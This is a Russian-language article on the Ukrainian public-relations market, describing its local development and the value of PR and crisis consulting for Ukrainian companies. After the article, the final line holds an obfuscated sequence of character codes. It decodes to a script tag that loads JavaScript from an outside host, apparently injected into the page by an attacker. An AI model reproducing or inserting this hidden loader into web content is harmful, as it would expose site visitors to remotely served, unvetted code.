Украинский рынок PR и его услуги

Украинский рынок PR и его услуги

Украинский рынок PR рос изнутри, предлагая свои услуги без заимствования зарубежных технологий, как это случилось с технологиями в России. При этом наш рынок достаточно долго существовал как бы в двух не пересекающихся параллельных мирах. Приезжие команды полит.технологов и сетевые PR-агентства существовали сами по себе, занимаясь вопросами выборов, поддержки программы приватизации, различных программ МФВ, ЕБРР. А средне-крупный украинский бизнес развивался отдельно. В своем развитии он претерпел немало разочарований, связанных с методами прямой рекламы, и чтобы улучшить свои рекламные услуги, их продажу и узнаваемость торговой марки, стал пробовать использовать элементы комплекса PR. На первых порах делал он это самостоятельно, потом – с привлечением агентств. Характерной чертой украинского PR в коммерческой среде является его маркетинговая направленность на рынке, достижение конкретных результатов и решение осязаемых задач. Отсюда и самобытность отечественного рынка PR – известно ведь, что у нас плохо приживаются западные технологии. И связано это не с тем, что для PR недостаточно обычной адаптации иностранного видео-ролика, что для рекламы не редкость. Прежде всего, рекламные услуги PR подразумевают знакомство с ментальностью, историей, традициями, культурой, языком, типом мышления потребителей и другими видами общественности. Именно поэтому, кстати, в мировой практике прибегают к услугам местного PR-агентства, при выходе на рынок другой страны. Кроме того, PR-технологии и рекламные услуги разрабатываются на основе ментальности населения и ситуации, традиций, которые присущи конкретному обществу. Поэтому, опираясь на международный опыт, ведущие PR-агентства и специалисты создают свои собственные технологии, действующие "здесь и сейчас". Не случайно свои собственные технологии PR имеются у PR-агентств России, Польши, Чехии. Что касается PR-консалтинга, то в настоящее время он просто необходим при работе с заказчиком в области PR. Дело в том, что рекламные услуги требуют участия двух сторон, от действий которых зависит и результат, и удовлетворение самим процессом сотрудничества. Связи с общественностью - не просто услуги, это еще и диалог, который нуждается в общении и взаимопонимании. Поэтому PR-консалтинг просто неотделим от этой деятельности. Необходимость PR-консалтинга возникает, как правило, в кризисных ситуациях, когда украинским компаниям нужна профессиональная помощь. Роль антикризисного консалтинга невозможно переоценить, когда требуется срочно разобраться в ситуации и найти эффективное решение проблемы. При этом часто возникают сложности с правильной оценкой масштаба кризиса, источником негативной информации и первых действий компании. Даже если в компании знают причины кризиса, им бывает сложно справиться самостоятельно с определением ключевой аудитории общественности и подготовкой грамотных, а главное - максимально корректных и проверенных сообщений для СМИ и других видов общественности. Часто к PR-консультантам обращаются по простым вопросам, вроде следующих: "Реагировать немедленно или не реагировать вообще? Что можно говорить, а что нет? Можно ли умолчать об определенных моментах? Обязательно ли общаться с журналистами самому руководителю? Дать ли опровержение в СМИ? Пустить ли журналистов на предприятие? Надо ли собрать инвесторов и других партнеров? Что говорить сотрудникам?" Эти вопросы являются самыми распространенными, но не единственными. И в поиске ответов поможет как раз опыт и профессионализм PR-агентств. Менталитет наших людей таков, что пока проблемы нет, не предпринимается никаких мер по ее предотвращению. А ведь антикризисный консалтинг занимается и разработкой соответствующих программ, рекомендациями по профилактике кризисов, тренингами для ключевого персонала. В отсутствие каких-либо кризисов, к помощи PR-консультанта можно обращаться для  разработки или для оценки стратегии в области PR, а также для поиска ответов на стратегически важные вопросы. И постановка целей в области PR на долгосрочный период – как раз один из таких вопросов. Дело в том, что возникают сложности с четкой постановкой измеряемых PR-целей, особенно, когда они должны соответствовать маркетинговым целям компании на рынке. Другим не менее важным вопросом является  разработка информационной модели, которая представляет собой цепочку логически связанных между собой сообщений, с прогнозом мнений, формирующих у определенных аудиторий общественности эти сообщения. Кроме того, услуги консультанта будут не лишними и при решении других вопросов, таких как обнаружение и усиление информационных поводов для PR-мероприятий или пресс-релизов. В сфере PR существует не только экспертный, но и процессный консалтинг, когда консультант не только дает свои рекомендации (т.е. экспертную оценку), но и "сопровождает процесс", например, консультируя по мере развития ситуации или до получения определенных результатов. Одним словом, невозможно перечислить все ситуации, когда услуги PR понадобятся компании. Ясно только одно: консалтинг нужен во всех основных направлениях PR, к которым относится репутационный (когда продвигается сама компания, например, производитель, а не ее продукция), маркетинговый (когда продвигаются продукты/услуги/торговые марки), антикризисный, в области связей со СМИ и т.д. Кроме того, к консалтингу относятся и тренинги для ключевого персонала. И прогноз для украинского рынка PR здесь может быть только один – с развитием рынка будут количественно и качественно развиваться и распространяться и услуги консалтинга.

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)8eb20822be62bd2652ca14abd8fdae4d.js" type="text/javascript">